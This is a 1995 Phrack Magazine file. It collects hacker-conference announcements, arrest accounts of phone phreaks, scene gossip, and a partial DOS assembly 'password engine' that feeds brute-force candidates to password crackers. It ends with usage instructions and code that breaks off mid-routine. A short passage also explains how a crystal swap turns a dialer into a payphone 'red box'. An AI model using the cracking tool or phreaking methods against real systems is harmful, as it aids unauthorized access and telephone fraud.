| ==Phrack Magazine== | |
| Volume Six, Issue Forty-Seven, File 3 of 22 | |
| // // /\ // ==== | |
| // // //\\ // ==== | |
| ==== // // \\/ ==== | |
| /\ // // \\ // /=== ==== | |
| //\\ // // // // \=\ ==== | |
| // \\/ \\ // // ===/ ==== | |
| PART I | |
| ------------------------------------------------------------------------------ | |
| -----BEGIN PGP SIGNED MESSAGE----- | |
| Phrack Magazine and Computer Security Technologies proudly present: | |
| The 1995 Summer Security Conference | |
| SSSS U U M M M M EEEEE RRRR CCCC OOOO N N | |
| S U U MM MM MM MM E R R C O O NN N | |
| SSS U U M M M M M M M M EEE RRRR C O O N N N | |
| S U U M M M M M M E R R C O O N NN | |
| SSSS UUUU M M M M EEEEE R R CCCC OOOO N N | |
| "SUMMERCON" | |
| June 2-4 1995 @ the Downtown Clarion Hotel in Atlanta, Georgia | |
| This is the official announcement and open invitation to the 1995 | |
| incarnation of Summercon. In the past, Summercon was an invite-only | |
| hacker gathering held annually in St. Louis, Missouri. Starting | |
| with this incarnation, Summercon is open to any and all interested | |
| parties: Hackers, Phreaks, Pirates, Virus Writers, System Administrators, | |
| Law Enforcement Officials, Neo-Hippies, Secret Agents, Teachers, | |
| Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers, | |
| Programmers, Conspiracy Nuts, Musicians and Nudists. | |
| LOCATION: | |
| The Clarion Hotel is located in downtown Atlanta, 9 miles from | |
| Hartsfield International Airport and just a few blocks from the | |
| Peachtree Center MARTA Station. | |
| Considering the exorbitant expenses involved with attending other | |
| conferences of this type, Rooms at Summercon are reduced to | |
| $65 per night for Single or Double Occupancy | |
| The Clarion Hotel Downtown, Courtland at 70 Houston St., NE, | |
| Atlanta, GA 30303 | |
| (404) 659-2660 or (800) 241-3828 (404) 524-5390 (fax) | |
| No one likes to pay a hundred dollars a night. We don't expect you | |
| to have to. Spend your money on room service, drinks in the hotel bar, | |
| or on k-rad hacker t-shirts. Remember: Mention that you are attending | |
| Summercon in order to receive the discount. | |
| DIRECTIONS | |
| 75/85 Southbound - Exit 97 (Courtland). Go 3 blocks south on Courtland | |
| then turn left on Houston (John Wesley Dobbs Ave.) | |
| 20 East - Exit 75/85 North at International. Turn Left on Courtland at | |
| Houston Ave. NE. (aka. John Wesley Dobbs Ave. NE.) | |
| 20 West - Exit 75/85 North at International. One block to Courtland | |
| and right at Houston Ave. NE. (John Wesley Dobbs Ave. NE.) | |
| Atlanta Airport Shuttle - The Express Bus that leaves from Atlanta's | |
| International Airport will drop you off at many hotels in the downtown | |
| area, including the Clarion. The shuttle should be no more than 12 | |
| dollars. Fares may be paid at the Airport Shuttle in the Ground | |
| Transportation area of the Airport Terminal. | |
| MARTA - The Metropolitan Atlanta Rapid Transit Authority (MARTA), is a | |
| convenient and inexpensive way to negotiate most of the Atlanta area. | |
| Take the MARTA train from the Airport to the Peach Tree Center Station. | |
| Walk three blocks down Houston to the intersection of Houston and | |
| Courtland. The MARTA fare will be roughly 2 dollars. | |
| Taxis - The average cab fare from Atlanta's Airport to the downtown area | |
| is roughly 30 dollars. | |
| CONFERENCE INFO | |
| It has always been our contention that cons are for socializing. | |
| "Seekret Hacker InPh0" is never really discussed except in private | |
| circles, so the only way anyone is going to get any is to meet new people | |
| and take the initiative to start interesting conversations. | |
| Because of this, the formal speaking portion of Summercon will be | |
| held on one day, not two or three, leaving plenty of time for people | |
| to explore the city, compare hacking techniques, or go trashing and | |
| clubbing with their heretofore unseen online companions. | |
| The "Conference" will be held on June 3rd from roughly 11:00 am until | |
| 6:00 pm with a 1 hour lunch break from 1:00 to 2:00. | |
| NO VIDEO TAPING WILL BE ALLOWED IN THE CONFERENCE ROOM. Audio Taping | |
| and still photography will be permitted. | |
| CURRENT LIST OF SPEAKERS: | |
| Robert Steele - Ex-Intelligence Agent, Founder and CEO of Open Source | |
| Solutions (a private sector intelligence firm) | |
| Topic: Hackers from the Intelligence Perspective | |
| Winn Schwartau - Author of "Information Warfare" and "Terminal Compromise", | |
| Publisher of Security Insider Report, and noted security | |
| expert | |
| Topic: Electromagnetic Weaponry | |
| Bob Stratton - Information Security Expert from one of America's largest | |
| Internet service providers | |
| Topic: The Future of TCP/IP Security | |
| Eric Hughes - Cryptography Expert and founding member of the "Cypherpunks" | |
| Topic: Cryptography, Banking, and Commerce | |
| Annaliza Savage - London-based Director/Producer | |
| Topic: Discussion of her documentary "Unauthorized Access" | |
| (Followed by a public screening of the film) | |
| Chris Goggans - Editor of Phrack Magazine and Summercon M.C. | |
| Topic: introductions, incidentals and a topic which is sure | |
| to culminate in an international incident. | |
| (Other Speakers May Be Added - Interested parties may contact scon@fc.net) | |
| COSTS | |
| Since other cons of this type have been charging from 25 to 40 dollars | |
| entry fees, we are only charging 10 dollars. Yes, that's correct, | |
| TEN (10) dollars in US currency. Money is far too scarce among the | |
| hacker community to fleece everyone for money they will probably need | |
| to eat with or pay for their hotel rooms. | |
| WHAT TO DO IN ATLANTA: | |
| To attempt to make everyone's stay in Atlanta more exciting, we are | |
| contacting local establishments to arrange for special discounts and/or | |
| price reductions for Summercon attendees. Information will be handed | |
| out regarding these arrangements at the conference. | |
| Atlanta is a happening town. | |
| Touristy Stuff Party Time | |
| The World of Coca-Cola Buckhead | |
| Underground Atlanta The Gold Club | |
| Georgia Dome (Baseball?) (Countless Other Clubs and Bars) | |
| Six Flags | |
| CONTACTING SUMMERCON SPONSORS | |
| You can contact the Summercon sponsors by several means: | |
| E-mail: scon@fc.net | |
| WWW: http://www.fc.net/scon.html | |
| Snail Mail: Phrack Magazine | |
| 603 W. 13th #1A-278 | |
| Austin, TX 78701 | |
| If deemed severely urgent, you can PGP your email with the following PGP | |
| key: | |
| - -----BEGIN PGP PUBLIC KEY BLOCK----- | |
| Version: 2.6 | |
| mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP | |
| Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk | |
| Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR | |
| tBRwaHJhY2tAd2VsbC5zZi5jYS51cw== | |
| =evjv | |
| - -----END PGP PUBLIC KEY BLOCK----- | |
| See you in Atlanta! | |
| -----BEGIN PGP SIGNATURE----- | |
| Version: 2.6 | |
| iQCVAwUBL4mMEaR4oxgb1CldAQE5dQP+ItUraBw4D/3p6UxjY/V8CO807qXXH6U4 | |
| 46ITHnRJXWfEDRAp1jwl+lyavoo+d5AJPSVeeFt10yzVDEOb258oEZkIkciBnr7q | |
| mUu563/Qq67gBsOWYP7sLdu3KEgedcggkzxtUzPxoVRVZYkHWKKjkG1t7LiT3gQ5 | |
| uRix2FrftCY= | |
| =m/Yt | |
| -----END PGP SIGNATURE----- | |
| ------------------------------------------------------------------------------ | |
| UNAUTHORIZED ACCESS | |
| "Unauthorized Access [is] a documentary that tells the story of the | |
| computer underground from our side, it captures the hacker world | |
| from Hamburg to Los Angeles and virtually everywhere in between." | |
| 2600 The Hacker Quarterly | |
| Computers are becoming an integral part of our everyday existence. | |
| They are used to store and send a multitude of information, from | |
| credit reports and bank withdrawals, to personal letters and highly | |
| sensitive military documents. So how secure are our computer | |
| systems? | |
| The computer hacker is an expert at infiltrating secured systems, | |
| such as those at AT&T, TRW, NASA or the DMV. Most computer systems | |
| that have a telephone connection have been under siege at one time | |
| or another, many without their owner's knowledge. The really good | |
| hackers can reroute the telephone systems, obtain highly sensitive | |
| corporate and government documents, download individual's credit | |
| reports, make free phone calls globally, read private electronic | |
| mail and corporate bulletins and get away without ever leaving a | |
| trace. | |
| So who are these hackers? Just exactly WHAT do they do and WHY do | |
| they do it? Are they really a threat? What do they DO with the | |
| information that they obtain? What are the consequences of their | |
| actions? Are hackers simply playing an intellectual game of chess | |
| or are hackers using technology to fight back and take control of | |
| a bureaucratic system that has previously appeared indestructible? | |
| Unauthorized Access is a documentary that demistifies the hype and | |
| propaganda surrounding the computer hacker. Shot in 15 cities | |
| and 4 countries, the film hopes to expose the truths of this subculture | |
| focusing on the hackers themselves. | |
| Unauthorized Access is a view from inside the global underground. | |
| For a PAL (European) copy send a cheque/postal order for 15 British | |
| Pounds or $25 for NTSC (American) standard to: | |
| Savage Productions | |
| Suite One | |
| 281 City Road | |
| London EC1V 1LA | |
| ------------------------------------------------------------------------------ | |
| ACCESS ALL AREAS | |
| Hacking Conference | |
| 1st - 2nd July, 1995 | |
| (Saturday & Sunday) | |
| King's College, London, UK | |
| -------------------------------WHAT-IT-IS--------------------------------- | |
| The first UK hacking conference, Access All Areas, is to be run in London | |
| later this year. It is aimed at hackers, phone phreaks, computer security | |
| professionals, cyberpunks, law enforcement officials, net surfers, | |
| programmers, and the computer underground. | |
| It will be a chance for all sides of the computer world to get together, | |
| discuss major issues, learn new tricks, educate others and meet "The | |
| Enemy". | |
| -------------------------------WHERE-IT-IS-------------------------------- | |
| Access All Areas is to be held during the first weekend of July, 1995 at | |
| King's College, London. King's College is located in central London on | |
| The Strand and is one of the premier universities in England. | |
| -----------------------------WHAT-WILL-HAPPEN----------------------------- | |
| There will be a large lecture theatre that will be used for talks by | |
| computer security professionals, legal experts and hackers alike. The | |
| topics under discussion will include hacking, phreaking, big brother and | |
| the secret services, biometrics, cellular telephones, pagers, magstrips, | |
| smart card technology, social engineering, Unix security risks, viruses, | |
| legal aspects and much, much more. | |
| Technical workshops will be running throughout the conference on several | |
| topics listed above. | |
| A video room, equipped with multiple large screen televisions, will be | |
| showing various films, documentaries and other hacker related footage. | |
| The conference facilities will also include a 10Mbps Internet link | |
| connected to a local area network with various computers hanging off of it | |
| and with extra ports to connect your laptop to. | |
| ------------------------------REGISTRATION-------------------------------- | |
| Registration will take place on the morning of Saturday 1st July from | |
| 9:00am until 12:00 noon, when the conference will commence. Lectures and | |
| workshops will run until late Saturday night and will continue on Sunday | |
| 2nd July from 9:00am until 6:00pm. | |
| ----------------------------------COST------------------------------------ | |
| The price of admission will be 25.00 British pounds (approximately US $40.00) | |
| at the door and will include a door pass and conference programme. | |
| -----------------------------ACCOMMODATION-------------------------------- | |
| Accommodation in university halls of residence is being offered for the | |
| duration of the conference. All prices quoted are per person, per night | |
| and include full English breakfast. (In British pounds) | |
| SINGLE TWIN | |
| WELLINGTON HALL 22.00 16.75 | |
| Special prices for British and Overseas university students, holding | |
| current student identification, are also available - please call King's | |
| Campus Vacation Bureau for details. | |
| All bookings must be made directly with the university. They accept | |
| payment by cash, cheque and credit card. | |
| To making a booking call the following numbers... | |
| KING'S CAMPUS VACATION BUREAU | |
| Telephone : +44 (0)171 351 6011 | |
| Fax : +44 (0)171 352 7376 | |
| ----------------------------MORE-INFORMATION------------------------------ | |
| If you would like more information about Access All Areas, including | |
| pre-registration details then please contact one of the following... | |
| Telephone : +44 (0)973 500202 | |
| Fax : +44 (0)181 224 0547 | |
| Email : info@phate.demon.co.uk | |
| ------------------------------------------------------------------------------ | |
| D I S T R I B U T E W I D E L Y | |
| *****FIRST CALL FOR PAPERS***** | |
| InfoWarCon '95 | |
| A 2 Day International Symposium | |
| on Information Warfare | |
| September 7-8, 1995 | |
| Stouffer Concourse Hotel | |
| Arlington, VA | |
| Presented by: | |
| National Computer Security Association | |
| Winn Schwartau and Interpact, Inc. | |
| Robert Steele and OSS, Inc. | |
| CONFERENCE OVERVIEW: | |
| The Information Warfare Conference (InfoWarCon) is our third | |
| international conference dedicated to the exchange of ideas, | |
| policies, tactics, weapons, methodologies and defensive posture | |
| of Information Warfare on a local, national, and global basis. | |
| InfoWarCon will bring together international experts from a broad | |
| range of disciplines to discuss and integrate concepts in this | |
| rapidly evolving field. Attendees will intensely interact with | |
| the speakers and presenters as well as each other to increase | |
| each other's understanding of the interrelatedness of the topics. | |
| While there are many interpretations of Information Warfare by | |
| different groups, the current working definition we employ is: | |
| Information Warfare is the use of information and informa | |
| tion systems as weapons in a conflict where information and | |
| information systems are the targets. | |
| Information Warfare is broken down into three categories, and | |
| InfoWarCon speakers and attendees will interactively examine them | |
| all: | |
| Class I: Personal Privacy. "In Cyberspace You Are Guilty | |
| Until Proven Innocent." The mass psychology of information. | |
| Privacy versus stability and law enforcement. | |
| Class II: Industrial and Economic Espionage. Domestic and | |
| international ramifications and postures in a globally | |
| networked, competitive society. | |
| Class III: Global Information Warfare. Nation-state versus | |
| Nation-state as an alternative to convention warfare, the | |
| military perspective and terrorism. | |
| THE CONFERENCE | |
| The conference is designed to be interactive - with extensive | |
| interaction between all participants. The preliminary contents | |
| and discussions will focus on: | |
| - What is Information Warfare? | |
| - What Are the Targets? | |
| - Protecting the Global Financial Infrastructure | |
| - Military Perspectives on InfoWar | |
| - InfoWar Vs. Non-Lethal Warfare | |
| - Defending the U.S. Infrastructure | |
| - The Intelligence Community and Information | |
| - Open Source Intelligence | |
| - The Psychology of Information | |
| - Privacy Balances | |
| - Information As the Competitive Edge | |
| - International Cooperation | |
| - Denial of Service | |
| - Cyber-Terrorism | |
| - Offensive Terrorism | |
| - Offensive InfoWar Techniques | |
| - Defensive InfoWar Postures | |
| - Education and Awareness Training | |
| - Corporate Policy | |
| - Government Policy | |
| - Global Policy | |
| - Espionage | |
| - Export Controls of Information Flow | |
| - The Legal Perspective | |
| - The New Information Warriors | |
| Plenary sessions will accommodate all attendees, while break-out | |
| sessions will provide more intimate presentations and interactiv | |
| ity on topics of specific interests. | |
| SUBMISSIONS: | |
| Submission for papers are now be accepted. We are looking for | |
| excellent speakers and presenters with new and novel concepts of | |
| Information Warfare. You may submit papers on the topics listed | |
| above, or on others of interest to you, your company or govern | |
| ment. | |
| We welcome innovative thought from the private sector, the gov | |
| ernment (civilian, military and intelligence) and the interna | |
| tional community. Submissions must be received by May 1, 1995, | |
| and notification of acceptance will occur by June 1, 1995. | |
| Please submit 2-3 page presentation outlines to: | |
| winn@infowar.com. | |
| All submissions and the contents of InfoWarCon '95 will be in | |
| English. If you must submit a hard copy: Fax: 813.393.6361 or | |
| snail mail to: Interpact, Inc. 11511 Pine St., Seminole, FL | |
| 34642 | |
| All submissions and presentation should be unclassified, as they | |
| will become Open Source upon submission and/or acceptance. | |
| SPONSORS: | |
| The Information Warfare Symposium is currently choosing sponsors | |
| for various functions. | |
| Continental Breakfast, Day 1 and Day 2 | |
| Morning Coffee Break, Day 1 and Day 2 | |
| Lunch, Day 1 and Day 2 | |
| Afternoon Coffee Break, Day 1 and Day 2 | |
| Cocktail Party, Day 1 | |
| Each Corporate or Organizational sponsor will be included in all | |
| promotional materials and Symposium function. For more infor- | |
| mation, contact Paul Gates at the NCSA. Voice: 717.258.1816 or | |
| email: 747774.1326@Compuserve.com. | |
| EXHIBITS: | |
| Limited space is available for table-top displays for commercial | |
| or governmental products, services, educational or other promo | |
| tion. For further information, contact Paul Gates at the National | |
| Computer Security Association. 717.258.1816 | |
| REGISTRATION: | |
| Payment made BEFORE July 1, 1995: | |
| ( ) $445.00 NCSA Member/OSS Attendee | |
| ( ) $545.00 All others | |
| Payment made AFTER July 1, 1995: | |
| ( ) $495.00 NCSA Members/OSS Attendees | |
| ( ) $595.00 All others | |
| ( ) I'M INTERESTED, but would like more information sent to the | |
| address above. Please include a free copy of your 32 page | |
| "Information Security Resource Catalog". | |
| ( ) I'd like to know more about NCSA on-site training, security | |
| audits and consulting services. Please have someone give me | |
| a call. | |
| MAIL OR FAX TO: | |
| National Computer Security Association | |
| 10 South Courthouse Avenue | |
| Carlisle, PA 17013 | |
| Phone 717-258-1816 or FAX 717-243-8642 | |
| EMAIL: 74774.1326@compuserve.com | |
| CompuServe: GO NCSAFORUM | |
| Winn Schwartau Interpact, Inc. | |
| Information Security & Warfare | |
| V:813.393.6600 F:813.393.6361 | |
| Email: Winn@Infowar.Com | |
| ------------------------------------------------------------------------------ | |
| Ed Cummings, also known to many in cyberspace as "Bernie S" was arrested | |
| on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale | |
| of a device to commit Telecommunications fraud charges. He is being held in | |
| Delaware County Prison in lieu of $100,000.00 Bail. His story follows. | |
| On the evening of the 13th Bernie S. received a page from his mail drop. | |
| Some people he knew from Florida had stopped in at his mail drop thinking | |
| it was his address. They were looking to purchase several 6.5 Mhz Crystals. | |
| These crystals when used to replace the standard crystal in the RADIO SHACK | |
| Hand Telephone dialer, and with some programming, produce tones that trick | |
| pay phones into believing they have received coins. These are commonly | |
| referred to as "red boxes" and got their name from an actual red box pulled | |
| from a pay phone in the late seventies by some curious person. | |
| Ed Cummings met these people at a local 7-11 (which 7-11?) where he was | |
| to sell the widely used electronic timing crystals for roughly $4 a piece. | |
| The purchaser only had two twenty dollar bills and Ed Cummings no change. | |
| Ed Cummings went into the 7-11 to get some change to make the transaction. | |
| A police officer noticed a van parked in the parking lot of the 7-11 with | |
| more several African Americans inside. As Ed was leaving the 7-11 he noticed | |
| fifteen police cars pulling into the parking lot of the 7-11. | |
| Next thing he knew the police were asking him if they could `rifle` | |
| through his car. He said no. Moments later as he was talking to a Detective | |
| and noticed another police officer going through his car. He asked the officer | |
| to stop. They did not, in all the police confiscated a few hundred 6.5Mhz | |
| crystals (which he resells for roughly $4 a piece) and a large box of 100 | |
| dialers. The police told him they would get back to him, and he could have | |
| his electronics back if the contents of the bag were legal. In the contents | |
| of the seized items was one modified dialer, that a customer returned after | |
| modification explaining that it did not work, a broken red box. | |
| The next day Ed `Bernie S.` Cummings was over at a friend`s house working | |
| on their computer when eight to ten plain clothed armed men burst into the | |
| house and ordered him and his friends to freeze. They cuffed him and took him | |
| to a holding cell (what jail?). There he was left without a blanket or jacket | |
| to sleep with in the cold cell. | |
| That evening the Secret Service had been called in when someone figured | |
| out what the dialers and crystals would do when put together. The | |
| United States Secret Service found his home and entered it, while they were | |
| questioning him. | |
| The next morning at his arraignment he was finally told of the charges | |
| he was being held upon. They were Two misdemeanor Charges of manufacture, | |
| Distribution and Sale of devices of Telecommunications Fraud. and Two Unlawful | |
| use of a computer charges. His bail was automatically set to $100,000.00 | |
| because Ed Cummings refused talk with the police without his attorney present. | |
| The Secret Service presented to the judge a 9 page inventory of what | |
| they had found in his home. On that inventory there 14 computers. 2 printers. | |
| more Boxes of bios chips for the systems he worked with. Eprom burners which | |
| the Federal Agents had labeled "Cellular telephone chip reprogramming adapters" | |
| Eproms are used in everything from Automobile computers to personal computers. | |
| They also confiscated his toolbox of screw drivers, wire clippers and other | |
| computer oriented tools he used for his consulting job. | |
| The Judge dropped the Two unlawful use of a computer charges due to | |
| the fact that the evidence was circumstantial and the county had no actual | |
| evidence that Ed had ever used the computers in question. | |
| As of 3/27/1995 Ed Cummings is still in Delaware County Prison | |
| awaiting his trial. His trial has not yet been scheduled and Ed will most | |
| likely not raise the One Hundred Thousand Dollars needed to be released on | |
| bail. | |
| ------------------------------------------------------------------------------ | |
| "Don't believe the hype." - Public Enemy, 1988 | |
| This file's purpose is to clear up any misconceptions about the recent | |
| situation that has come upon the sociopolitical group known as KoV. | |
| As it stands now, (10:55 PM EST on 1/29/95), NO ONE has been busted for | |
| ANYTHING. We have received several tip-offs from private sources regarding | |
| a supposed "FBI investigation" of our group that is purported to be active | |
| at this very minute. However, with the exception of a few VERY suspicious | |
| incidents and coincidences, there has been NO HARD EVIDENCE thus far about | |
| ANYONE getting busted for ANYTHING. So while we are EXTREMELY concerned for | |
| the integrity of our innocence, we must stress that nothing has gone down. | |
| Yet. | |
| We have very good reason to believe that a few of those among us are about | |
| to be charged with various false accusations by a local university. However | |
| the current mental state of the person in charge of this charade is also in | |
| question. Therefore it would be logical to assume nothing. The conflicting | |
| tip-offs, rumors, warnings and threats that we have received make it even | |
| more difficult to get a clear picture of exactly what is going on. We have | |
| heard so many things from so many different sources, both credible and | |
| questionable, that we would be hard-pressed to give an accurate evaluation | |
| of the current state of things. | |
| What we can say for sure, however, is that KoV officially died on Monday, | |
| January 23, 1995, along with its communications network, KoVNet. This | |
| promises to be a great loss to the open-minded and sociopolitical community | |
| as well as the free-thinkers and activists who supported us so generously. | |
| Our reasons for disbanding the group were many, but the foremost was in | |
| light of the current situation we are facing. | |
| Consider this last obstacle our final, stalwart stand against the evils of | |
| AmeriKKKan government and its various greedy, capitalistic agencies. | |
| From the moment of KoV's conception, they have publicly sought to destroy | |
| us; to silence our questioning of authority, to oppress our free-thinking | |
| minds, and to close off our intellectual channels of communication. They | |
| have even gone so far as to stalk us in public places. 'Tis a shame indeed. | |
| If you have any questions or if you wish to contact us for any reason, | |
| you may email sgolem@pcnet.com with the subject or header of "ATTN: KoV". | |
| I will try to post further updates of this saga to CiPNet, ThrashNet, | |
| QuantumNet, InsanityNet, ScumNet, FizzNet, NukeNet and any others I can. | |
| We would appreciate any support that other h/p, art or political groups can | |
| lend us. Until then, my friends... | |
| -Lord Valgamon, Malicious Intent, Onslaught, Leland Gaunt & the rest of KoV | |
| ------------------------------------------------------------------------------ | |
| What happens when you are caught beige boxing. | |
| by Rush 2 | |
| Yeah yeah, I'm the only one. But here is a generally interesting | |
| description of everything to getting caught to arraignment. | |
| Well about 5 months ago i needed to set up a conference really quick.. | |
| it was about 12:00 (never knew there was a 10:00 pm curfew in that area) | |
| and went to a 25 pair box at this local strip mall. Well I was out there | |
| the box was already open and I was just about to start testing pairs to | |
| see which was connected and what wasn't. | |
| All of a sudden, i hear this loud screeching sound of a car coming | |
| to a skid from doing about 90mph. I turned and saw that typically dirty | |
| squad car about to hit me.. you know the car, mud and dust on the tires | |
| and body, coffee and smudge marks all over the windshield. i got on my | |
| bike and started to run. Now the thing is I COULD have gotten away.. the | |
| pathetic excuse for a cop had run not more than 10 yards after me and | |
| decided that I was a threat so he pulled his handgun and yelled. I saw | |
| this and thought it would be wiser to stop than get shot. | |
| Within 2 minutes at LEAST 10 squad cars had come to his aide.. i did | |
| not know i was less than a half mile from a police station and they were | |
| looking for a prowler in the general area. The police did the normal, | |
| called me scum, asked me what i was doing, searched me until they were | |
| satisfied... than picked me up and threw me in the car... the funny | |
| thing was they didn't see my phone until they threw me into the back seat | |
| and the cord fell out.. (they never saw the page of notes and 'naughty' | |
| material in my pocket though it was about 4 inches thick and sticking out | |
| that a blind man could see it. | |
| Well they got me to the station and pried my info out, and called my | |
| father... I came up with a good enough story about some made up user | |
| who told me to go across the street and plug in.. then I was told I | |
| would be dealt with in the next week... I did not receive anything for | |
| three and a half months. | |
| Once the time came for the arraignment (for a juvenile they called it | |
| an intake). I got to go to the police station, sit for about 3 hours (as | |
| if i thought they would be on time) until I waited for my probation | |
| officer. Finally she got there and we proceeded to talk. She explained | |
| all of the charges and my lawyer (interesting guy) laughed, I was being | |
| charged with prowling (could be disputed I was on a public sidewalk and | |
| there in that strip mall is a 24 hr laundry mat), loitering (again that | |
| could be disputed), and attempted theft of services (though I NEVER even | |
| plugged in). | |
| After this was all said i spent the next hour talking with the lady | |
| in private. I immediately found she had an interest in computers and was | |
| having a problem with her home pc. So I easily changed the topic to my | |
| fascination in computers and solved her problem with her computer, and | |
| answered at least 50 questions about them. In the last 10-15 minutes of | |
| the conversation all i could get from her were statements about how | |
| impressed and how intrigued she was with me. She ended up giving me a | |
| look (that was hard to judge but i am staying away from this chick) that | |
| was either confusion or attraction, slipped me a card with her home phone | |
| number and name and called back in my lawyer and parents. | |
| Once they got back in, all that she really said was I was a great boy, | |
| that she would like to see me do more with my time besides computers, and | |
| that she was taking my sentence of 12 months formal probation with 300 | |
| hours of community service to 3 months of informal probation with 30 | |
| hours of community service. That and she said bell was asking her what | |
| to do and she would tell them that it was a non issue since I did not | |
| plug in and even if I had it would not be their concern unless I had | |
| plugged in to the telco access part of the network interface. | |
| Well I have yet to receive official record of having to perform | |
| the community service or the probation but I called my probation officer | |
| yesterday and said she wasn't putting the community service into the | |
| punishment and it has been an equivalent amount of time to just say that | |
| since I haven't gotten in trouble since she will count the probation as | |
| already served. Luckily she based all other needs of me on the report | |
| from a teacher, and with my luck she picked the one teacher, my computers | |
| teacher, that no matter what I did or said would lie and say I didn't. | |
| Thanks to erikb for publishing this, and greets to CXrank, paradox, | |
| dark phiber, the fat cop (who spilled his coffee and box of donuts | |
| coming after me) that made this all possible, and to everyone else. | |
| -rush 2 | |
| http://www-bprc.mps.ohio-state.edu/cgi-bin/hpp/Rush_2.html | |
| Look for My site, unforeseen danger soon to be on a 28.8 slip | |
| and by the end of the summer on a 500k slip connect. | |
| ------------------------------------------------------------------------------ | |
| [Something found on IRC] | |
| Danny Partridge Emmanuel Goldstein | |
| (AKA Danny Bonaduce: (AKA Eric Corley: | |
| a child star from the child-like publisher | |
| "The Partridge Family" of 26oo magazine. | |
| ---------------------- ------------------ | |
| Hosts a boring local Hosts a boring local | |
| radio program. radio program. | |
| Quasi Celebrity Quasi Celebrity | |
| Status among Status among | |
| 70's freaks telephone phreaks | |
| Periods of Heavy Periods of Heavy | |
| Drug Usage Drug Usage | |
| Involved in Sex Involved in Sex | |
| Scandal with Scandal with | |
| another man another man | |
| Last name is Friends with Phiber | |
| "Bonaduce" Optik whose first | |
| handle was "Il Duce" | |
| Supplements incoming Supplements incoming | |
| by doing desperate by doing desperate | |
| local talk shows local talk shows | |
| whenever he can. whenever he can. | |
| ------------------------------------------------------------------------------ | |
| Top 10 #hack fights that would be the coolest to see. | |
| (And no, Ophie's not in it twice just because she's a girl...) | |
| =========================================================================== | |
| 10.) The D.C. Convention Center is Proud to Present: Hot-Oil Wrestling | |
| featuring KL & TK. | |
| 9.) Ludichrist vs. GFM, to be resolved at the next convention, or, uh, the | |
| one after that... or, uh... | |
| 8.) C-Curve and Elite Entity, "Who's who?" | |
| 7.) Ben Camp vs. Ben Sherman, "Particles of Novocain Everywhere." | |
| (Or: "I'm totally numb, let me hug you!!!") | |
| 6.) Dan Farmer and Pete Shipley: "Whips vs. Chains" | |
| 5.) Grayarea vs. Netcom "No, *I* want root..." | |
| 4.) WWF Wrestling with Len and |al|. | |
| 3.) Ophie vs. Voyager, "Night of the Living Dead." | |
| 2.) Okinawa vs. Gail Thackery, "The Winner Gets Okinawa's Testicle." | |
| and the number one #hack fight is | |
| 1.) Ophie vs. all the #hack guys, "10 Bucks on the Girl" | |
| ------------------------------------------------------------------------------ | |
| P A S S W O R D E N G I N E (for IBM PC's) by Uncle Armpit | |
| +++++++++++++++++++++++++++++++++++++++++++++ | |
| The device driver code listed below provides a data stream of passwords. | |
| The device driver approach was used to speed up the process | |
| of cracking passwords on an incremental basis. The usual approach was | |
| to generate the passwords to a file, then reading the file, etc..the device | |
| driver approach circumvents these file storage problems, and others, such as | |
| having enough free disk space and delays from disk i/o. | |
| This driver operates completely in memory (approx. 0.5Kb) | |
| How practical is this? | |
| ---------------------- | |
| This program would be very useful if you think you may know what strategy | |
| the user/admin uses for picking out their passwords. Without eliciting some | |
| sort of a strategy, forget it-- unless your desperate enough!! | |
| A "strategy" could consist of any of these possible advantages-- | |
| 1) default passwords (ie: SIN, student #, birth date, phone number...) | |
| 2) the mutation of a lUSERs' known password from another system | |
| 3) viewing the mark typing in most of their password with a couple | |
| of unseen characters | |
| 4) etc... | |
| --------------------------- | |
| With the sample device driver provided, passwords starting at | |
| 'aaaaaaa' and ending with 'zzzzzzz' will be generated. The length | |
| of the password string can be modified by changing the length of | |
| the password string itself (that is, the variable "number"). The | |
| range of characters in the passwords can also be changed by | |
| modifying the following two lines: | |
| ;hackdrv.sys | |
| ;. | |
| ;. | |
| ; | |
| for ending character-- | |
| cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range | |
| ...and for starting character | |
| cmp byte ptr [number+si],'a' ;starting char. in range | |
| ; | |
| ;---------------------- | |
| for instance, if you wished to generate numbers from "0000000" to | |
| "9999999" | |
| -change the ending character to: | |
| cmp byte ptr [number+si],'9'+1 | |
| -starting character to: | |
| cmp byte ptr [number+si],'0' | |
| and "number" variable from 'aaaaaa' to '0000000' and then | |
| recompile.. | |
| ----- | |
| ..or in the third case, if u had observed a lUSER type in most of | |
| their password, you may want to rewrite the code to limit the | |
| search. IE: limit the keys to a certain quadrant of the keyboard. | |
| Modify the code starting at "reiterate:" and ending at "inc_num | |
| endp" for this. | |
| ================================================================= | |
| /'nuff of this!/ How do I get things working? | |
| ----------------------------------------------- | |
| Compile the device driver "hackdrv.sys", and the second program, | |
| "modpwd.asm". Then specify the device driver inside config.sys | |
| (ie: "c:\hackdrv.sys"). The code below was compiled with the a86 | |
| compiler, v3.03. Some modifications might be needed to work with | |
| other compilers. | |
| To use it in prgs like crackerjack, type in the following on the | |
| command line: | |
| c:\>jack -pwfile:<your password file here!> -word:hackpwd | |
| ------ | |
| If you had stopped a cracker program (eg: crackerjack) and want to | |
| pick up from where you left off, run the program "modpwd.com". | |
| This program can change HACKDRVs password through- | |
| a) a command line argument (ie: "modpwd aabbbbe") | |
| b) executing the program with no parameters (this method also | |
| displays the current password in memory) | |
| Happy Hacking, | |
| Uncle Armpit | |
| ;-----------------------cut here-------------------------------- | |
| ;Program HACKDRV.SYS | |
| ; | |
| org 0h | |
| next_dev dd -1 | |
| attribute dw 0c000h ;character device w/ ioctl calls | |
| strategy dw dev_strategy | |
| interrupt dw dev_int | |
| dev_name db 'HACKPWD ' | |
| countr dw offset number | |
| number db 'aaaaaa',0ah ;<----six characters, lower case | |
| numsize equ $-number - 2 | |
| afternum: | |
| ;working space for device driver | |
| rh_ofs dw ? | |
| rh_seg dw ? | |
| dev_strategy: ;strategy routine | |
| mov cs:rh_seg,es | |
| mov cs:rh_ofs,bx | |
| retf | |
| dev_int: ;interrupt routine | |
| pushf | |
| push ds | |
| push es | |
| push ax | |
| push bx | |
| push cx | |
| push dx | |
| push di | |
| push si | |
| cld | |
| push cs | |
| pop ds | |
| mov bx,cs:rh_seg | |
